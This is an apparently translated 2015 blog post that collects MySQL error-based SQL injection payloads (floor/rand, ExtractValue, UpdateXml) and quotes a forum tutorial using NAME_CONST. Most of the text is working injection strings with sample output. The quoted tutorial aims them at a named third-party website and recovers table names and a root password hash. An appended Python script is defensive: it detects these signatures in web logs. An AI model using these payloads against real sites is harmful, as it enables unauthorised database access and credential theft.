
MySQL: using the floor, ExtractValue and UpdateXml error-based injection modes

Posted on 2015-11-11 19:03:37

1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example: first run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement makes the server raise an error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To query other data, change the expression in the position where version() sits.
For example, to read the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Further material collected:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|
http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
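As an added defensive check (not part of the original post or the quoted tutorial), the following Python script flags the four error-based signatures described above (floor/rand, extractvalue, updatexml, paired NAME_CONST) in web-server access logs and recognises the MySQL error strings from the outputs above when they leak into a response body. The log format, client IP and path are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the four error-based techniques discussed above, matched
# against the URL-decoded, lower-cased query string.
TECHNIQUES = {
    "floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "extractvalue": re.compile(r"extractvalue\s*\("),
    "updatexml": re.compile(r"updatexml\s*\("),
    "name_const": re.compile(r"name_const\s*\(.*name_const\s*\("),  # two calls -> duplicate column
}
# MySQL error strings quoted in the outputs above: one of these in a response
# body means database errors are reaching the client.
LEAK_PATTERNS = [
    re.compile(r"duplicate entry '.*' for key 'group_key'", re.I),
    re.compile(r"xpath syntax error", re.I),
    re.compile(r"duplicate column name", re.I),
]
# Combined-log request line (assumed format): client IP, request target, status.
LOG_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_request(query_string: str) -> list[str]:
    """Names of the techniques whose signature appears in the query string."""
    decoded = unquote_plus(unquote_plus(query_string)).lower()  # decode '+' and %XX
    return [name for name, rx in TECHNIQUES.items() if rx.search(decoded)]

def response_leaks_error(body: str) -> bool:
    """True if the response body carries one of the MySQL error strings."""
    return any(rx.search(body) for rx in LEAK_PATTERNS)

def scan_log(log_text: str) -> list[dict]:
    """Flag combined-format log lines whose query string matches a signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RX.match(line)
        if m:
            ip, target, status = m.groups()
            found = classify_request(target.partition("?")[2])
            if found:
                hits.append({"ip": ip, "status": int(status), "techniques": found})
    return hits

# Constructed sample log (not from the page): a normal request, then payloads
# in the shapes shown above, one of them percent-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [11/Nov/2015:19:04:01 +0800] "GET /detail.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 210
203.0.113.5 - - [11/Nov/2015:19:05:12 +0800] "GET /detail.php?id=1%20and%20extractvalue%281%2Cconcat%280x5c%2C%28select%20user%28%29%29%29%29 HTTP/1.1" 500 198
203.0.113.5 - - [11/Nov/2015:19:06:40 +0800] "GET /detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 190
"""
```

Flagged requests that also received a 500 are the ones to pair with the application's error page output; if response_leaks_error() fires on that output, the fix is server-side (disable verbose database errors and use parameterised queries), not a signature.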